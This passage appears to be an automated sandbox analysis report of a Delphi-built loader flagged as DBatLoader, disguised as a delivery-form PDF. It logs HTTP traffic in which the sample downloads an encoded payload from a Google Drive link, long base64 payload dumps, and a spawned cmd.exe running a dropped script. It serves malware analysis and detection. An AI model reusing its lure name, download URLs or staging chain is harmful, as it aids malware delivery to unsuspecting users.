                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449756199.59.243.227805684C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 26, 2024 11:53:07.091793060 CET497OUTGET /7l3h/?64S=LVahBLZpOHw0&ltuttt-X=6zLgQVJeSE3kO4Sf+RLctODToVrPhYaQ0c4BWNSIp+OQ9yx8H1ct7jyxXPxozjpZEa0Pz8J6l7jjf+e1lE7ZvAiUMQsmdIIWqY7TwFLSKhERhv9WS2Ztltg= HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.bellhomehd.shop
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                        Dec 26, 2024 11:53:08.269448996 CET1236INHTTP/1.1 200 OK
                                                                                        date: Thu, 26 Dec 2024 10:53:07 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1474
                                                                                        x-request-id: 3cf22859-8ac3-40bf-8840-fef920e4c4bc
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Nxbk2XTjBeaku/F1lxqXI3oknC+w6DwSkZUytYFf1HA+gjTCII79cwBEoXiz3sVgCdMd1Qwwi1jCe1RVExx97A==
                                                                                        set-cookie: parking_session=3cf22859-8ac3-40bf-8840-fef920e4c4bc; expires=Thu, 26 Dec 2024 11:08:08 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4e 78 62 6b 32 58 54 6a 42 65 61 6b 75 2f 46 31 6c 78 71 58 49 33 6f 6b 6e 43 2b 77 36 44 77 53 6b 5a 55 79 74 59 46 66 31 48 41 2b 67 6a 54 43 49 49 37 39 63 77 42 45 6f 58 69 7a 33 73 56 67 43 64 4d 64 31 51 77 77 69 31 6a 43 65 31 52 56 45 78 78 39 37 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Nxbk2XTjBeaku/F1lxqXI3oknC+w6DwSkZUytYFf1HA+gjTCII79cwBEoXiz3sVgCdMd1Qwwi1jCe1RVExx97A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                        Dec 26, 2024 11:53:08.269510984 CET927INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2NmMjI4NTktOGFjMy00MGJmLTg4NDAtZmVmOTIwZTRjNGJjIiwicGFnZV90aW1lIjoxNzM1MjEwMz


                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449731172.217.19.2384436600C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-26 10:52:01 UTC205OUTGET /uc?export=download&id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept: */*
                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                        Host: drive.google.com
                                                                                        2024-12-26 10:52:02 UTC1319INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 26 Dec 2024 10:52:02 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-eOMGB1q0geEnm8b4auRR6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449732142.250.181.974436600C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-26 10:52:04 UTC223OUTGET /download?id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy&export=download HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept: */*
                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                        Host: drive.usercontent.google.com
                                                                                        2024-12-26 10:52:07 UTC4932INHTTP/1.1 200 OK
                                                                                        X-GUploader-UploadID: AFiumC7QtIk4n-bn1F14RDjRK8XFG9USQerVF2QXSpFGVCkpQWVpxsftw3_f47fYdg_evJtb
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Security-Policy: sandbox
                                                                                        Content-Security-Policy: default-src 'none'
                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                        X-Content-Security-Policy: sandbox
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Content-Disposition: attachment; filename="233_Lwnkboxdlyz"
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Credentials: false
                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 820516
                                                                                        Last-Modified: Tue, 24 Dec 2024 06:00:32 GMT
                                                                                        Date: Thu, 26 Dec 2024 10:52:07 GMT
                                                                                        Expires: Thu, 26 Dec 2024 10:52:07 GMT
                                                                                        Cache-Control: private, max-age=0
                                                                                        X-Goog-Hash: crc32c=ZzqbHQ==
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2024-12-26 10:52:07 UTC4932INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 6b 46 68 55 66 4a 42 49 5a 49 53 45 68 48 78 59 53 47 42 51 64 49 53 45 69 48 52 67 6d 49 42 41 65 46 53 45 6d 47 71 61 75 70 56 6b 6a 70 37 46 4c 56 79 51 62 47 41 38 63 4a 52 45 5a 4a 69 65 6d 72 71 56 5a 49 36 65 78 53 35 4b 45 68 59 2b 53 67 49 6d 52 6b 5a 47 50 68 49 43 47 67 6f 32 52 6b 5a 43 4e 68 70 53 4f 66 6f 79 46 6b 5a 53 49 6b 6f 53 46 6a 35 4b 41 69 5a 47 52 6b 59 2b 45 67 49 61 43 6a 5a 47 52 6b 49 32 47 6c 49 35 2b 6a 49 57 52 6c 49 69 53 68 49 57 50 6b 6f 43 4a 6b 5a 47 52 6a 34 53 41 68 6f 4b 4e 6b 5a 47 51 6a 59 61 55 6a 6e 36 4d 68 5a 47 55 69 4a 4b 45 68 59 2b 53 67 49 6d 52 6b 5a 47 50 68 49 43 47 67 6f 32 52 6b 5a 43 4e 68 70 53 4f 66 6f 79 46 6b 5a 53 49 6b 6f 53 46 6a 35 4b 41 69 5a 47 52 6b 59 2b
                                                                                        Data Ascii: pq6lWSOnsUskFhUfJBIZISEhHxYSGBQdISEiHRgmIBAeFSEmGqaupVkjp7FLVyQbGA8cJREZJiemrqVZI6exS5KEhY+SgImRkZGPhICGgo2RkZCNhpSOfoyFkZSIkoSFj5KAiZGRkY+EgIaCjZGRkI2GlI5+jIWRlIiShIWPkoCJkZGRj4SAhoKNkZGQjYaUjn6MhZGUiJKEhY+SgImRkZGPhICGgo2RkZCNhpSOfoyFkZSIkoSFj5KAiZGRkY+
                                                                                        2024-12-26 10:52:07 UTC4832INData Raw: 61 39 2b 63 6b 64 49 37 2b 31 38 32 6e 50 74 4a 59 39 38 70 32 51 58 36 4d 4b 66 2f 5a 57 47 78 54 73 77 48 78 78 4e 77 4d 36 59 4e 51 41 55 6a 54 75 57 51 39 52 37 51 30 61 46 4c 78 6e 6d 50 38 6d 39 41 4d 6b 34 33 57 41 34 55 4a 51 6b 4b 44 6b 79 41 33 77 4d 30 55 41 33 6b 74 53 64 35 45 46 61 78 4a 78 4d 54 32 2b 42 64 38 66 4a 51 57 71 56 55 2b 75 33 32 68 73 59 32 51 54 74 64 31 6e 37 59 64 42 4b 6a 7a 56 5a 72 31 4e 4a 61 6d 49 72 77 70 61 72 39 61 37 76 4c 72 4b 4b 66 45 42 4e 49 2f 7a 73 42 68 65 4d 42 4f 33 31 4e 76 57 42 6b 48 65 38 58 76 77 55 6e 63 41 6f 48 58 70 55 61 32 75 49 54 4d 32 6e 77 41 6d 51 4f 48 30 50 38 79 62 42 73 57 4d 53 68 76 37 32 36 74 45 35 51 54 30 2b 46 55 36 6f 34 36 33 69 70 46 6b 58 34 43 46 56 6c 48 37 44 58 46 74 61
                                                                                        Data Ascii: a9+ckdI7+182nPtJY98p2QX6MKf/ZWGxTswHxxNwM6YNQAUjTuWQ9R7Q0aFLxnmP8m9AMk43WA4UJQkKDkyA3wM0UA3ktSd5EFaxJxMT2+Bd8fJQWqVU+u32hsY2QTtd1n7YdBKjzVZr1NJamIrwpar9a7vLrKKfEBNI/zsBheMBO31NvWBkHe8XvwUncAoHXpUa2uITM2nwAmQOH0P8ybBsWMShv726tE5QT0+FU6o463ipFkX4CFVlH7DXFta
                                                                                        2024-12-26 10:52:07 UTC1324INData Raw: 71 66 45 62 6d 66 64 6c 5a 36 61 52 4e 64 56 4a 41 38 34 47 43 52 67 31 6c 78 30 6d 55 65 2f 39 30 33 76 63 4b 7a 32 64 37 2b 54 62 41 7a 66 45 56 56 6b 56 39 58 62 6e 54 69 59 6e 4c 6f 79 4b 4d 55 43 39 65 4b 37 78 5a 41 49 39 61 78 68 65 47 33 67 68 66 37 6e 32 66 68 6c 31 4b 48 76 47 42 62 75 4a 34 68 4f 54 41 59 4d 6f 66 65 4b 45 67 75 36 50 4d 46 6a 78 72 4e 41 74 36 6d 52 59 37 4c 70 68 55 41 6b 2b 7a 79 70 55 44 59 75 6d 7a 43 6e 56 52 68 46 5a 33 67 37 66 63 74 73 34 70 51 39 73 6a 58 50 74 62 2b 48 33 70 59 6d 69 50 37 6a 48 74 57 51 4b 43 71 73 6e 53 55 4f 6f 7a 43 32 78 4b 42 41 4a 65 76 53 37 59 2f 4c 76 6d 37 56 53 44 61 7a 31 6d 71 76 64 52 6e 46 2b 6f 62 4a 61 77 75 2b 72 75 2b 32 44 4c 64 47 64 50 78 61 63 44 73 63 74 46 6d 69 45 71 39 37
                                                                                        Data Ascii: qfEbmfdlZ6aRNdVJA84GCRg1lx0mUe/903vcKz2d7+TbAzfEVVkV9XbnTiYnLoyKMUC9eK7xZAI9axheG3ghf7n2fhl1KHvGBbuJ4hOTAYMofeKEgu6PMFjxrNAt6mRY7LphUAk+zypUDYumzCnVRhFZ3g7fcts4pQ9sjXPtb+H3pYmiP7jHtWQKCqsnSUOozC2xKBAJevS7Y/Lvm7VSDaz1mqvdRnF+obJawu+ru+2DLdGdPxacDsctFmiEq97
                                                                                        2024-12-26 10:52:07 UTC1390INData Raw: 52 4e 38 67 54 71 36 52 61 43 37 4c 5a 31 4d 75 6d 46 79 7a 5a 62 55 76 39 68 65 5a 55 54 41 42 68 4c 6f 78 46 69 66 4c 6d 71 69 41 47 4c 54 65 4b 78 58 38 4b 50 6c 62 6c 4e 49 73 46 31 61 55 4c 71 48 64 66 33 4e 77 6e 64 43 4c 2b 62 6e 74 72 6a 4f 4e 33 69 53 77 56 51 4e 54 53 31 2b 74 4a 5a 55 46 49 78 2b 67 55 6e 50 53 7a 38 58 58 65 6f 66 63 44 35 6f 6b 70 76 41 4b 4a 33 56 54 75 66 37 4a 36 53 74 6d 51 33 6d 53 52 72 44 43 67 4f 30 4c 75 49 63 6a 69 6b 48 6d 31 53 53 78 39 69 68 78 6a 72 62 38 4f 5a 30 47 63 48 41 54 44 71 64 6e 32 64 71 39 77 34 31 58 62 4b 2f 6b 64 56 6c 51 43 59 4d 70 30 43 4b 41 70 31 63 30 69 65 4e 63 79 76 35 72 32 4d 34 6a 4e 65 51 33 73 4e 42 67 44 77 67 50 31 51 63 57 30 4a 6a 6b 64 4e 5a 59 2f 38 59 2f 6f 33 64 32 48 4f 71
                                                                                        Data Ascii: RN8gTq6RaC7LZ1MumFyzZbUv9heZUTABhLoxFifLmqiAGLTeKxX8KPlblNIsF1aULqHdf3NwndCL+bntrjON3iSwVQNTS1+tJZUFIx+gUnPSz8XXeofcD5okpvAKJ3VTuf7J6StmQ3mSRrDCgO0LuIcjikHm1SSx9ihxjrb8OZ0GcHATDqdn2dq9w41XbK/kdVlQCYMp0CKAp1c0ieNcyv5r2M4jNeQ3sNBgDwgP1QcW0JjkdNZY/8Y/o3d2HOq
                                                                                        2024-12-26 10:52:07 UTC1390INData Raw: 50 50 75 39 2b 6b 64 77 2f 35 77 50 2f 4a 79 47 71 38 4a 44 2b 55 72 54 65 74 35 5a 2f 76 6b 4e 50 75 6b 57 56 6e 62 2b 54 5a 46 4f 30 50 63 4e 5a 6c 48 4d 6e 78 4b 41 71 76 41 48 39 62 32 63 4c 55 46 30 63 43 56 71 76 47 51 53 6b 4a 76 62 52 6e 50 46 53 31 6a 43 66 4e 75 39 56 43 30 35 77 6c 63 75 63 53 2b 55 31 31 64 58 2b 32 68 2f 7a 49 55 59 76 38 6e 56 46 73 67 55 67 6b 6a 59 51 4e 4d 72 65 4f 6f 76 53 65 56 38 69 56 45 57 51 35 76 35 65 39 4d 35 51 4f 74 2f 2f 76 72 67 35 78 70 49 49 63 62 36 52 68 58 4d 59 58 6d 71 75 63 63 34 2f 46 38 77 6f 33 2b 75 39 39 32 62 48 53 39 5a 53 4e 73 46 30 78 73 61 44 56 53 4e 4b 77 72 51 6a 4f 5a 44 70 59 33 66 53 54 79 34 7a 61 48 71 49 31 4a 70 2b 2b 34 31 68 4f 6d 5a 30 69 66 5a 63 46 53 74 37 35 68 34 44 6d 78
                                                                                        Data Ascii: PPu9+kdw/5wP/JyGq8JD+UrTet5Z/vkNPukWVnb+TZFO0PcNZlHMnxKAqvAH9b2cLUF0cCVqvGQSkJvbRnPFS1jCfNu9VC05wlcucS+U11dX+2h/zIUYv8nVFsgUgkjYQNMreOovSeV8iVEWQ5v5e9M5QOt//vrg5xpIIcb6RhXMYXmqucc4/F8wo3+u992bHS9ZSNsF0xsaDVSNKwrQjOZDpY3fSTy4zaHqI1Jp++41hOmZ0ifZcFSt75h4Dmx
                                                                                        2024-12-26 10:52:07 UTC1390INData Raw: 47 47 4c 66 42 58 77 45 4a 59 32 7a 49 64 74 4e 2b 73 76 38 4d 4a 74 4a 6a 41 4e 67 34 7a 2f 62 70 36 54 46 45 5a 5a 54 59 52 69 4d 47 53 51 6f 54 66 78 51 62 41 55 6e 44 33 77 72 50 50 77 72 74 5a 77 35 72 67 33 36 6e 47 74 41 67 42 47 73 62 76 58 66 66 61 4d 71 71 70 45 64 67 4b 41 52 46 56 69 32 43 72 34 42 2b 74 49 56 39 4e 4e 74 39 41 4c 43 4a 36 53 62 33 56 6c 6b 48 62 58 6e 63 68 4f 63 35 6b 79 74 6b 70 69 4c 32 4c 59 41 41 63 72 75 67 66 33 71 4b 5a 42 67 6a 38 32 42 53 5a 42 67 38 58 43 58 71 69 47 67 42 6a 54 75 77 34 54 68 64 33 71 48 45 49 35 64 79 64 36 59 4c 6a 72 4b 69 4c 63 77 55 6f 38 35 79 47 31 59 52 32 34 6c 63 72 55 65 72 6e 54 52 71 6c 63 79 4e 47 39 67 6e 47 48 30 66 46 63 52 4f 66 56 50 35 38 43 6d 33 32 41 54 4b 6f 55 30 79 2b 2b
                                                                                        Data Ascii: GGLfBXwEJY2zIdtN+sv8MJtJjANg4z/bp6TFEZZTYRiMGSQoTfxQbAUnD3wrPPwrtZw5rg36nGtAgBGsbvXffaMqqpEdgKARFVi2Cr4B+tIV9NNt9ALCJ6Sb3VlkHbXnchOc5kytkpiL2LYAAcrugf3qKZBgj82BSZBg8XCXqiGgBjTuw4Thd3qHEI5dyd6YLjrKiLcwUo85yG1YR24lcrUernTRqlcyNG9gnGH0fFcROfVP58Cm32ATKoU0y++
                                                                                        2024-12-26 10:52:07 UTC1390INData Raw: 62 52 4a 4c 48 55 67 68 6c 7a 54 50 62 77 44 7a 55 4a 62 58 49 52 77 74 43 70 53 5a 49 51 30 74 68 59 50 65 75 4b 71 34 59 37 78 52 39 53 4d 33 73 31 4d 32 43 79 61 73 55 52 38 44 79 33 55 44 4f 52 44 35 62 56 49 47 52 42 39 51 47 74 53 4b 6e 64 69 47 59 58 47 69 67 71 5a 57 5a 33 74 4a 33 6d 63 76 74 50 66 44 55 67 32 69 61 33 33 63 52 52 5a 45 41 56 64 64 4b 69 4b 69 35 56 48 78 72 65 36 45 53 37 32 53 2f 4a 4a 36 2b 68 51 77 31 44 5a 7a 53 46 44 37 42 66 79 35 4a 76 68 66 56 4d 72 4b 6f 78 4d 77 4d 57 54 79 79 6b 4b 53 55 36 6a 58 6b 79 62 69 30 79 46 33 34 67 55 49 38 50 44 66 72 46 44 46 56 2b 32 57 32 51 70 49 78 33 65 34 2f 33 4d 56 79 49 58 4d 75 30 30 35 30 4b 6d 62 68 50 63 37 30 4b 46 70 68 78 74 6e 59 58 39 42 78 74 54 2b 62 50 63 46 6f 34 69
                                                                                        Data Ascii: bRJLHUghlzTPbwDzUJbXIRwtCpSZIQ0thYPeuKq4Y7xR9SM3s1M2CyasUR8Dy3UDORD5bVIGRB9QGtSKndiGYXGigqZWZ3tJ3mcvtPfDUg2ia33cRRZEAVddKiKi5VHxre6ES72S/JJ6+hQw1DZzSFD7Bfy5JvhfVMrKoxMwMWTyykKSU6jXkybi0yF34gUI8PDfrFDFV+2W2QpIx3e4/3MVyIXMu0050KmbhPc70KFphxtnYX9BxtT+bPcFo4i
                                                                                        2024-12-26 10:52:07 UTC1390INData Raw: 46 31 37 4b 74 5a 68 4b 56 76 55 64 41 70 70 75 56 70 4a 55 6a 55 30 48 57 59 4e 4a 55 54 71 78 5a 74 52 5a 2b 37 67 4c 71 44 44 55 58 49 55 42 65 67 4a 33 33 31 50 6a 74 55 75 34 57 42 41 6e 61 4d 67 4c 67 4e 73 33 7a 64 47 49 56 54 72 61 34 75 7a 42 51 71 35 55 6b 52 71 5a 79 62 6f 42 65 34 47 6d 74 45 43 41 59 74 46 2b 35 36 76 66 44 47 73 47 46 6a 6a 6a 70 38 73 36 6b 6e 67 32 56 72 69 52 58 54 7a 4f 51 56 48 6d 69 5a 4b 76 2b 4c 4e 47 30 64 68 76 45 71 48 45 42 79 37 6e 55 45 77 6e 66 4f 48 43 41 47 67 76 64 46 63 45 69 65 6a 32 49 62 5a 76 7a 7a 4c 54 6b 4e 6d 2f 4f 39 65 48 7a 78 42 79 48 51 34 2f 77 48 73 50 5a 4f 49 47 57 62 36 47 32 4a 66 42 73 6e 4d 32 4b 62 41 32 6f 77 45 31 45 62 63 4c 48 7a 37 38 44 48 7a 78 6f 45 6e 74 4e 63 69 4e 77 70 30
                                                                                        Data Ascii: F17KtZhKVvUdAppuVpJUjU0HWYNJUTqxZtRZ+7gLqDDUXIUBegJ331PjtUu4WBAnaMgLgNs3zdGIVTra4uzBQq5UkRqZyboBe4GmtECAYtF+56vfDGsGFjjjp8s6kng2VriRXTzOQVHmiZKv+LNG0dhvEqHEBy7nUEwnfOHCAGgvdFcEiej2IbZvzzLTkNm/O9eHzxByHQ4/wHsPZOIGWb6G2JfBsnM2KbA2owE1EbcLHz78DHzxoEntNciNwp0
                                                                                        2024-12-26 10:52:07 UTC1390INData Raw: 69 77 63 4c 67 45 2f 6a 32 45 44 38 36 4a 32 61 75 79 42 56 39 72 4c 73 4b 6d 31 71 6f 78 6e 62 53 30 70 75 77 73 76 59 6d 38 59 58 63 47 39 72 6e 45 6e 4b 6d 4d 57 58 72 75 65 30 58 79 47 62 64 44 71 66 52 73 71 6b 71 4d 76 75 67 71 72 64 58 4b 72 2f 4e 50 52 4f 50 74 69 72 44 6e 6a 66 2f 56 53 4c 72 54 50 2b 62 41 44 50 39 79 4a 77 42 65 75 55 4e 4c 69 67 6a 48 61 31 50 4f 4f 49 74 67 52 41 57 55 2b 69 31 4e 2b 78 47 77 39 58 52 2f 32 7a 64 30 49 76 49 70 53 37 4c 72 4e 45 53 30 77 76 34 68 4f 6a 4c 62 53 76 34 68 68 39 56 30 4e 57 38 43 7a 54 64 68 4e 61 45 48 53 34 74 67 34 4c 2b 37 53 70 38 71 64 41 34 4c 58 4c 50 75 33 4f 72 48 36 75 63 52 51 4e 6c 5a 2b 30 37 56 69 42 6e 50 76 45 36 45 58 55 59 6a 45 30 70 2f 75 32 59 70 61 48 43 52 6b 61 36 67 6d
                                                                                        Data Ascii: iwcLgE/j2ED86J2auyBV9rLsKm1qoxnbS0puwsvYm8YXcG9rnEnKmMWXrue0XyGbdDqfRsqkqMvugqrdXKr/NPROPtirDnjf/VSLrTP+bADP9yJwBeuUNLigjHa1POOItgRAWU+i1N+xGw9XR/2zd0IvIpS7LrNES0wv4hOjLbSv4hh9V0NW8CzTdhNaEHS4tg4L+7Sp8qdA4LXLPu3OrH6ucRQNlZ+07ViBnPvE6EXUYjE0p/u2YpaHCRka6gm
                                                                                        2024-12-26 10:52:07 UTC1390INData Raw: 54 57 6d 46 70 48 38 30 4d 78 64 49 50 33 70 51 73 4d 34 6f 6a 47 6b 4f 78 4a 62 58 37 6e 4b 53 56 54 53 34 35 42 6b 6a 36 69 7a 70 38 4a 70 6d 49 4d 7a 62 4f 53 6a 4c 54 48 53 31 65 6e 6d 64 4a 74 75 78 74 73 35 72 57 77 2f 58 71 4f 63 36 6f 72 57 49 34 49 35 6f 58 68 45 64 30 62 4f 65 46 4c 76 77 33 6e 6f 6a 55 4d 44 65 64 32 4f 67 46 4e 57 50 44 2f 4d 49 73 49 77 32 55 4e 43 79 75 2f 53 38 42 61 34 39 76 72 44 35 36 6c 66 55 62 43 32 57 4e 4f 57 4b 42 59 4d 4c 73 44 2f 4e 64 64 46 77 6b 61 38 33 45 73 59 54 4d 55 37 73 75 54 42 63 2b 73 4f 78 4f 36 54 71 6a 2f 74 4c 71 41 41 68 43 77 37 78 79 74 39 4d 64 37 35 70 71 66 56 52 49 69 7a 52 68 64 72 72 6b 4b 2b 31 6d 34 74 43 2f 4e 70 63 6e 42 53 71 49 37 70 57 32 7a 34 49 37 50 61 45 52 6c 66 42 30 67 5a
                                                                                        Data Ascii: TWmFpH80MxdIP3pQsM4ojGkOxJbX7nKSVTS45Bkj6izp8JpmIMzbOSjLTHS1enmdJtuxts5rWw/XqOc6orWI4I5oXhEd0bOeFLvw3nojUMDed2OgFNWPD/MIsIw2UNCyu/S8Ba49vrD56lfUbC2WNOWKBYMLsD/NddFwka83EsYTMU7suTBc+sOxO6Tqj/tLqAAhCw7xyt9Md75pqfVRIizRhdrrkK+1m4tC/NpcnBSqI7pW2z4I7PaERlfB0gZ


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:05:51:58
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'444'352 bytes
                                                                                        MD5 hash:9E67C73F86B034D009280AB03DB20124
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:Borland Delphi
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1782801649.00000000023A6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1821232938.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:05:52:08
                                                                                        Start date:26/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
